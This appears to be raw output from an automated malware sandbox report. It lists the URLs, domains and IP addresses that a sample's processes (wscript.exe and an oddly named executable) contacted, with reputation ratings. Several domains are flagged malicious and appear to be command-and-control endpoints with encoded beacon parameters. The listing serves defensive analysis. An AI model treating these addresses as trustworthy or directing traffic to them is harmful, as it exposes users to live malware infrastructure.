                http://www.spectre.center/v70f/?x6lPJLCP=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5iQllq44F7p5XcgmXLNN6nBjN0OyNZNCI3LIrenW8X1LlSCw==&rJl09=1ZZ8JloHsT0%Avira URL Cloudsafe
                http://partner.mirohost.net0%Avira URL Cloudsafe
                https://www.imena.ua/domains/premium-domains0%Avira URL Cloudsafe
                http://www.jagdud.store/ohf8/0%Avira URL Cloudsafe
                https://www.imena.ua/blog/0%Avira URL Cloudsafe
                https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211100%Avira URL Cloudmalware
                https://www.imena.ua/how-search0%Avira URL Cloudsafe
                https://www.imena.ua/datacenter0%Avira URL Cloudsafe
                http://www.swenansiansie.xyz/08fk/0%Avira URL Cloudsafe
                https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
                https://www.imena.ua/help0%Avira URL Cloudsafe
                https://control.mirohost.net/auth/login.php?lang=ru0%Avira URL Cloudsafe
                https://mail.mirohost.net0%Avira URL Cloudsafe
                https://www.imena.ua/ru0%Avira URL Cloudsafe
                https://www.imena.ua/whois.php?domain=spectre.center0%Avira URL Cloudsafe
                https://companies.rbc.ru/0%Avira URL Cloudsafe
                https://www.imena.ua/payments0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF810%Avira URL Cloudsafe
                http://www.cbprecise.online/cvmn/?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g==0%Avira URL Cloudsafe
                https://www.imena.ua/check-domain?step=transfer0%Avira URL Cloudsafe
                https://www.imena.ua/support/domains-finance/icann-i-ee-funkcii0%Avira URL Cloudsafe
                https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-ua0%Avira URL Cloudsafe
                https://www.whskysr.com/27MTDK4Q/GG1SRSH/?uid=43019&sub1=enus3-1211100%Avira URL Cloudmalware
                http://www.jagdud.store/ohf8/?x6lPJLCP=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqPbYAwUAuWDp6UnVXFlAI3b5100n+OibKRbWUxoSKuxi8jQ==&rJl09=1ZZ8JloHsT0%Avira URL Cloudsafe
                http://www.cbprecise.online/cvmn/0%Avira URL Cloudsafe
                http://www.swenansiansie.xyz/08fk/?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT0%Avira URL Cloudsafe
                http://www.synd.fun/6sgf/0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm0%Avira URL Cloudsafe
                https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=0%Avira URL Cloudsafe
                https://www.imena.ua/0%Avira URL Cloudsafe
                http://www.synd.fun/6sgf/?rJl09=1ZZ8JloHsT&x6lPJLCP=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXc53AprHIV9+v08MymvOxMZcaRpk3N2TApqLdZWOdbNTanQ==0%Avira URL Cloudsafe
                https://www.imena.ua/domains/prices0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81-dark0%Avira URL Cloudsafe
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm0%Avira URL Cloudsafe
                https://www.imena.ua/domains/regtm0%Avira URL Cloudsafe
                https://www.imena.ua/ua0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                chrome.cloudflare-dns.com
                172.64.41.3
                truefalse
                  high
                  swenansiansie.xyz
                  3.33.130.190
                  truetrueunknown
                  www.spectre.center
                  5.39.10.93
                  truefalse
                    high
                    cbprecise.online
                    3.33.130.190
                    truetrueunknown
                    rtpsilva4d.click
                    67.223.117.169
                    truetrueunknown
                    natroredirect.natrocdn.com
                    85.159.66.93
                    truefalse
                      high
                      fg.microsoft.map.fastly.net
                      199.232.210.172
                      truefalse
                        high
                        it2sp8.vip
                        3.33.130.190
                        truetrue
                          unknown
                          wiretap.digital
                          3.33.130.190
                          truetrue
                            unknown
                            www.sidqwdf.fun
                            185.106.176.204
                            truetrue
                              unknown
                              code.jquery.com
                              151.101.130.137
                              truefalse
                                high
                                www.yun08ps.top
                                47.238.157.253
                                truetrue
                                  unknown
                                  sb.scorecardresearch.com
                                  18.165.220.110
                                  truefalse
                                    high
                                    prod.appnexus.map.fastly.net
                                    151.101.1.108
                                    truefalse
                                      high
                                      www.synd.fun
                                      194.58.112.174
                                      truetrue
                                        unknown
                                        www.jagdud.store
                                        209.74.64.187
                                        truetrue
                                          unknown
                                          googlehosted.l.googleusercontent.com
                                          172.217.19.225
                                          truefalse
                                            high
                                            assets.msn.com
                                            unknown
                                            unknownfalse
                                              high
                                              www.msn.com
                                              unknown
                                              unknownfalse
                                                high
                                                acdn.adnxs.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  c.msn.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    www.restobarbebek.xyz
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.cbprecise.online
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        www.rtpsilva4d.click
                                                        unknown
                                                        unknownfalse
                                                          unknown
                                                          clients2.googleusercontent.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            www.mp3cevir.xyz
                                                            unknown
                                                            unknowntrue
                                                              unknown
                                                              www.swenansiansie.xyz
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                www.wiretap.digital
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  www.it2sp8.vip
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    api.msn.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      browser.events.data.msn.com
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        NameMaliciousAntivirus DetectionReputation
                                                                        https://sb.scorecardresearch.com/b?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                          high
                                                                          http://www.restobarbebek.xyz/jm9b/true
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://www.rtpsilva4d.click/mbcs/true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.spectre.center/v70f/true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.wiretap.digital/gofy/?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ==true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.wiretap.digital/gofy/true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.spectre.center/v70f/?x6lPJLCP=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5iQllq44F7p5XcgmXLNN6nBjN0OyNZNCI3LIrenW8X1LlSCw==&rJl09=1ZZ8JloHsTtrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.jagdud.store/ohf8/true
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://sb.scorecardresearch.com/b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                            high
                                                                            https://acdn.adnxs.com/ast/ast.jsfalse
                                                                              high
                                                                              http://www.swenansiansie.xyz/08fk/true
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://code.jquery.com/jquery-3.6.3.min.jsfalse
                                                                                high
                                                                                http://www.cbprecise.online/cvmn/?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g==true
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.jagdud.store/ohf8/?x6lPJLCP=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqPbYAwUAuWDp6UnVXFlAI3b5100n+OibKRbWUxoSKuxi8jQ==&rJl09=1ZZ8JloHsTtrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                                                                  high
                                                                                  http://www.cbprecise.online/cvmn/true
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.swenansiansie.xyz/08fk/?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsTtrue
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.synd.fun/6sgf/true
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.synd.fun/6sgf/?rJl09=1ZZ8JloHsT&x6lPJLCP=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXc53AprHIV9+v08MymvOxMZcaRpk3N2TApqLdZWOdbNTanQ==true
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://sb.scorecardresearch.com/b?rn=1733906391803&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                                    high
                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                    https://duckduckgo.com/chrome_newtabwscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://giganet.ua/ruwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://duckduckgo.com/ac/?q=wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://reg.ruwscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.rbc.ru/technology_and_media/wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.imena.ua/domainstCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBm-darkme[1].json.29.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.imena.ua/documentswscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drfalse
                                                                                              high
                                                                                              https://img.imena.ua/js/bundle.min.jswscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://inau.ua/wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/en/how-searchwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.imena.ua/vpstCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000014.00000003.2484394423.0000028F71720000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.20.dr, edb.log.20.drfalse
                                                                                                high
                                                                                                https://www.ripe.net/wscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.lendingtree.com/?splitterid=home-equity&cproduct=homeequity&cchannel=content&csource=traBBI4MeJ[1].json.29.drfalse
                                                                                                    high
                                                                                                    https://www.imena.ua/hostingtCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.reg.ru/whois/?check=&dname=www.synd.fun&amp;reg_source=parking_autowscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://docs.google.com/manifest.json.19.drfalse
                                                                                                        high
                                                                                                        https://thehill.com/blogs/in-the-know/5032330-sheryl-crow-trump-reelection-kennedy-center-honors/me[1].json.29.drfalse
                                                                                                          high
                                                                                                          https://drive.google.com/manifest.json.19.drfalse
                                                                                                            high
                                                                                                            https://www.cnn.com/world/africa/us-queen-ghana-tamale-kennedy-johnson-spc?cid=external-feeds_iluminme[1].json.29.drfalse
                                                                                                              high
                                                                                                              http://partner.mirohost.netwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://deals.getxtra-pc.io/2QSW9DWJ/S2PR7B/?uid=146&sub1=enus5-1211BBI4MeJ[1].json.29.drfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              unknown
                                                                                                              https://www.imena.ua/domains/premium-domainswscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.imena.ua/blog/tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.reddit.com/msapplication.xml5.15.drfalse
                                                                                                                high
                                                                                                                https://www.imena.ua/datacenterwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&amwscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.imena.ua/how-searchwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json.19.drfalse
                                                                                                                    high
                                                                                                                    https://drive-daily-4.corp.google.com/manifest.json.19.drfalse
                                                                                                                      high
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://mail.mirohost.netwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://crl.ver)svchost.exe, 00000014.00000002.4501548462.0000028F71800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.imena.ua/helptCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.ecosia.org/newtab/wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://drive-daily-1.corp.google.com/manifest.json.19.drfalse
                                                                                                                              high
                                                                                                                              https://drive-daily-5.corp.google.com/manifest.json.19.drfalse
                                                                                                                                high
                                                                                                                                https://www.foxnews.com/sports/mike-tyson-faces-1-5-million-lawsuit-over-alleged-contract-violation-me[1].json.29.drfalse
                                                                                                                                  high
                                                                                                                                  https://people.com/michael-cole-the-mod-squad-actor-dies-at-84-8759376me[1].json.29.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/chromecontent_new.js.19.dr, content.js.19.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.msn.com/?ocid=iehp{7353942D-B79B-11EF-8C2C-ECF4BB570DC9}.dat.15.drfalse
                                                                                                                                        high
                                                                                                                                        https://control.mirohost.net/auth/login.php?lang=ruwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.imena.ua/rutCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.msn.com/en-us/community/channel/vid-cj9pqbr0vn9in2b6ddcd8sfgpfq6x6utp44fssrv6mc2gtybw0usme[1].json.29.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.imena.ua/whois.php?domain=spectre.centertCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://companies.rbc.ru/wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.imena.ua/paymentstCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.youtube.com/msapplication.xml8.15.drfalse
                                                                                                                                            high
                                                                                                                                            http://ogp.me/ns#wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://booking.com/dealspage.html?campaign_id=&aid=1533676&label=enus-native-backfillBBI4MeJ[1].json.29.drfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81me[1].json.29.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://chromewebstore.google.com/manifest.json0.19.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json.19.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.imena.ua/check-domain?step=transferwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://schema.org/OrganizationtCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://chrome.google.com/webstore/manifest.json0.19.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-uatCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js6U0QSVXF.htm.29.dr, WEXQZQBM.htm.16.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.yardbarker.com/entertainment/articles/20_facts_you_might_not_know_about_young_frankensteme[1].json.29.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.imena.ua/support/domains-finance/icann-i-ee-funkciiwscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.msn.com/favicon.icoimagestore.dat.29.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.whskysr.com/27MTDK4Q/GG1SRSH/?uid=43019&sub1=enus3-1211BBI4MeJ[1].json.29.drfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              http://www.amazon.com/msapplication.xml.15.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://www.twitter.com/msapplication.xml6.15.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGBmme[1].json.29.drfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.imena.ua/tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://drive-staging.corp.google.com/manifest.json.19.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF81-darkme[1].json.29.drfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=wscript.exe, 0000000C.00000002.4501045338.000000000591C000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.00000000031AC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.imena.ua/domains/priceswscript.exe, 0000000C.00000002.4503182089.00000000076C0000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.4501045338.000000000578A000.00000004.10000000.00040000.00000000.sdmp, tCyxXhRNgdPI.exe, 0000000D.00000002.4500198162.000000000301A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://api.msn.com:443/msn/Feed/me?$top=32&delta=True&session=925e1e92-229e-406c-801f-97b7ff304f70&me[1].json.29.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwscript.exe, 0000000C.00000002.4503396326.0000000007B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
